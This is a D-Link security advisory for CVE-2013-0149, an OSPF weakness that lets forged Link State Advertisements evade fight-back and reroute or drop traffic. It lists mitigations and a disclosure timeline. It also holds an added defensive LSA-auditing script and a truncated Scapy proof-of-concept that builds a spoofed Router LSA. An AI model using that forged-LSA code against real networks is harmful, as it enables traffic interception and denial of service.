Notified: May 28, 2013 Updated: August 05, 2013
Title: Open Shortest Path First (OSPF) Protocol does not specify unique LSA lookup identifiers
D-Link ID: DLINK-2013-VUL0213
Advisory URL: TBD prior to Aug. 1, 2013
Date published: August 1, 2013
Date of last update: 7/29/13 (will update on saving document)
Reported by: CERT
Release mode: Coordinated Release
Remotely Exploitable: Possible, but would require access via other product(s)
Locally Exploitable: Yes
CVE Name: CVE-2013-0149
The Open Shortest Path First (OSPF) protocol does not specify unique Link State
Advertisement (LSA) lookup identifiers, which allows an attacker to intercept traffic or
conduct a Denial of Service (DoS) attack.
This vulnerability can allow an attacker to re-route traffic through their own router,
compromising the confidentiality of the data, or to conduct a Denial of Service attack
against a router, dropping all traffic.
The following is the list of known affected devices and the associated firmware
(confirmed by D-Link). This will be updated as needed if additional units are affected.
1. DES-3810-28 – R2.20.B017 (HW Not available in the US)
5. Vendor Information, Solutions and Workarounds
D-Link distributes a number of devices which could potentially be affected by this
vulnerability; chiefly, any L3 managed switch that supports OSPF has the possibility of
being subject to this attack.
D-Link is working to reduce the potential impact of this vulnerability, which is a result of
an ambiguous standard. Currently we advise the following:
As always, adhering to best practices will be the strongest defense against attacks. As
long as your physical devices, networks, and protocols are secured, it will be very
difficult for an attacker to insert a rogue LSA to initiate this type of attack.
First, this vulnerability does not defeat cryptographic (MD5) authentication, so we
recommend a strong MD5 authentication key as your best defense.
We also recommend that administrators enable the OSPF passive interface feature to
stop sending or receiving routing table updates on interfaces that do not participate in
Finally, we recommend that networks use MAC-based Access Control (MAC) to
authenticate devices before they are able to communicate with the network. The MAC
feature is a client-less design so there is no need to install extra software on a user’s
computer, and ensures that only devices on a whitelist will have access to the network.
When used in conjunction with common security best practices, it can help to strongly
limit the possible vectors of attack.
D-Link is monitoring the situation for an update to the standard that can be implemented
to protect potentially affected devices.
Dr. Gabi Nakibly - NEWRSC, Rafael - Advanced Defense Systems Ltd.
Eitan Menahem - Telekom Innovation Laboratories, Ben Gurion University
Ariel Waizel - Telekom Innovation Laboratories, Ben Gurion University
Prof. Yuval Elovici - Telekom Innovation Laboratories, Ben Gurion University
The publication of this advisory was not coordinated with forementioned
7. Technical Description / Proof of Concept Code
7.1. OSPF “Fight Back” is triggered by LSAs with matching Router ID only, and so can
be evaded by using non-matching Router ID and Link State ID on a rogue LSA. Routing
lookup uses only the Link State ID field, and so may, depending on implementation,
result in selecting the rogue LSA before the valid LSA.
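A defensive check built on the description above, added here as an example and not part of the D-Link advisory: in a Router LSA (type 1), RFC 2328 sets the Link State ID to the originating router's Router ID, so a type 1 LSA whose Link State ID differs from its Advertising Router, or two type 1 LSAs sharing a Link State ID, marks the ambiguity. The function names and the sample LSA headers are constructed for illustration.

```python
import socket
import struct
from collections import defaultdict

# RFC 2328 A.4.1 LSA header (20 bytes): age, options, type,
# Link State ID, Advertising Router, sequence, checksum, length.
LSA_HDR = struct.Struct("!HBB4s4sIHH")
ROUTER_LSA = 1

def parse_lsa_header(raw):
    """Decode one 20-byte LSA header into a dict of the fields we audit."""
    if len(raw) < LSA_HDR.size:
        raise ValueError("truncated LSA header")
    _age, _opts, ls_type, ls_id, adv, seq, _ck, _len = LSA_HDR.unpack_from(raw)
    return {"type": ls_type, "ls_id": socket.inet_ntoa(ls_id),
            "adv_router": socket.inet_ntoa(adv), "seq": seq}

def audit_router_lsas(headers):
    """Flag Router LSAs that make a Link-State-ID-only lookup ambiguous."""
    findings = []
    by_ls_id = defaultdict(set)
    for h in headers:
        if h["type"] != ROUTER_LSA:
            continue  # other LSA types legitimately carry differing fields
        by_ls_id[h["ls_id"]].add(h["adv_router"])
        if h["ls_id"] != h["adv_router"]:
            findings.append(("id_mismatch", h["ls_id"], h["adv_router"]))
    for ls_id, advs in sorted(by_ls_id.items()):
        if len(advs) > 1:  # two entries answer the same lookup key
            findings.append(("ambiguous_lookup", ls_id, tuple(sorted(advs))))
    return findings

def _hdr(ls_type, ls_id, adv, seq):
    # Constructed sample header; checksum is left at 0 and not validated.
    return LSA_HDR.pack(1, 0x22, ls_type, socket.inet_aton(ls_id),
                        socket.inet_aton(adv), seq, 0, 20)

# Constructed LSDB snapshot: the third entry mimics the mismatch described.
SAMPLE_LSDB = [
    _hdr(1, "10.0.0.1", "10.0.0.1", 0x80000003),
    _hdr(1, "10.0.0.2", "10.0.0.2", 0x80000007),
    _hdr(1, "10.0.0.2", "10.0.0.99", 0x80000008),
    _hdr(5, "172.16.0.0", "10.0.0.1", 0x80000001),
]

def run_sample():
    return audit_router_lsas([parse_lsa_header(r) for r in SAMPLE_LSDB])

if __name__ == "__main__":
    for finding in run_sample():
        print(finding)
```
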
Scapy proof of concept attack script
attacker_source_ip = "192.168.13.1"
attacker_router_id = "192.168.18.1"
victim_destination_ip = "192.168.13.3"
victim_router_id = "192.168.37.3"
false_adv_router = "192.168.27.11"
seq_num = 0x80000004L
R3_FALSE_LSA = IP(src=attacker_source_ip, dst=victim_destination_ip) \
OSPF_Router_LSA(options=0x22, type=1, id=victim_router_id, adrouter=false_adv_router,
seq=seq_num, linklist=[ \
OSPF_Link(id="192.168.37.7", data="192.168.37.3", type=2, metric=1), \
OSPF_Link(id="192.168.13.3", data="192.168.13.3", type=2, metric=1), \
OSPF_Link(id="192.168.50.0", data="255.255.255.0", type=3, metric=3) \
• May 28, 2013 – Notification by CERT of the issue
• May 28, 2013 – Notify Qualified D-Link Resources of issue
• June 6, 2013 – CERT notified embargo date changed to July 30
• June 6, 2013 – D-Link Request CERT to resend details
• June 11, 2013 – D-Link receives details
• July 29, 2013 – CERT notified embargo date changed to Aug 1
• July 29, 2013 – D-Link Sends Vulnerability Response Report to CERT
• July 30, 2013 – D-Link Post Report for affected Products
• CVE-229804-2013.pdf – Owning the Routing Table Part II
Patrick Cline - Patrick.Cline@dlink.com
William Brown – William.Brown@dlink.com
Please see DLINK-2013-VUL0213.